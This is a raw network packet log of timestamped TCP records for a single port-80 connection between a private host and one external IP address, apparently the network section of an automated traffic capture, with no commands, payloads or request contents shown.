Sep 27, 2024 04:14:07.488975048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.488986969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.488997936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.489008904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.489018917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.489022970 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.489034891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.489078999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.547976017 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548008919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548018932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548048019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548069954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548093081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548105001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548115969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548259020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548259974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548270941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548283100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548294067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548305988 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548305988 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548352957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548491001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548501968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548512936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548523903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548533916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548551083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548559904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548559904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548564911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548577070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548580885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548588991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548615932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548660994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.548835039 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548846960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.548886061 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549057007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549067974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549079895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549089909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549099922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549109936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549120903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549129963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549141884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549143076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549143076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549150944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549154997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549161911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549171925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549181938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549192905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549201965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549201965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549207926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549247980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549248934 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549473047 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549535990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549638033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549648046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549658060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549668074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549688101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549699068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549710035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549720049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549731016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549732924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549732924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549732924 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549743891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549762964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549777031 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549801111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.549968004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549979925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.549990892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550020933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550049067 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550085068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550096989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550107002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550117016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550127983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550138950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550148964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550153017 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550159931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550169945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550180912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550203085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550203085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550203085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550228119 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550596952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550606966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550616980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550626993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550637960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550641060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550647974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550658941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550685883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550772905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550864935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550873995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550884962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550895929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550904989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550905943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550918102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550928116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550940990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.550946951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550947905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.550972939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.579689980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579701900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579713106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579772949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.579780102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579791069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579801083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579813004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.579837084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.579848051 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.579910040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580003023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580009937 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580020905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580030918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580041885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580053091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580060959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580063105 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580074072 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580116987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580116987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580312967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580327988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580338955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580348969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580359936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580364943 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580370903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580382109 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580389977 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580393076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.580418110 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.580447912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.581206083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.581218004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:07.581262112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.849023104 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:07.853944063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:08.569202900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:08.569318056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:08.659063101 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:08.664908886 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:09.371159077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:09.371247053 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:10.174793005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:10.179771900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:10.882299900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:10.882492065 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.520345926 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.525273085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763025999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763102055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763133049 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763164997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763199091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763214111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763214111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763214111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763236046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763240099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763261080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763269901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763293982 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763303041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763341904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763341904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763351917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763401985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763401985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763437033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763464928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763467073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763495922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763500929 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763500929 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763530970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763557911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.763573885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763573885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.763633013 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886466026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886502028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886535883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886538029 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886573076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886573076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886636019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886668921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886681080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886703014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886724949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886735916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886745930 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886787891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886789083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886821032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886848927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886852980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886862993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886903048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886919975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886953115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.886957884 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.886990070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887028933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887028933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887096882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887125015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887142897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887156010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887187958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887198925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887198925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887216091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887243032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887264013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887265921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887296915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887314081 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887327909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887335062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887357950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887402058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887402058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887407064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887454987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887487888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887495995 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887495995 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887515068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887530088 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887547016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887564898 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887579918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887589931 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887609005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887631893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887638092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887662888 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887679100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:11.887700081 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:11.887717962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.008791924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.008836031 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.008867025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.008892059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.008896112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.008928061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.008936882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.008977890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009001970 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009011984 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009027958 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009058952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009063005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009092093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009119987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009140968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009140968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009160995 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009170055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009203911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009205103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009237051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009267092 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009269953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009279013 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009321928 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009336948 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009368896 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009406090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009411097 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009411097 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009438992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009450912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009491920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009520054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009525061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009542942 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009557962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009567022 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009592056 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009622097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009630919 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009630919 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009654999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009686947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009696960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009696960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009718895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009722948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009752035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009768009 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009785891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009814024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009831905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009831905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009846926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009867907 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009885073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009908915 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009929895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.009933949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009968042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.009993076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010000944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010014057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:12.010032892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:12.010042906 CEST	49704	80	192.168.2.5	185.215.113.37
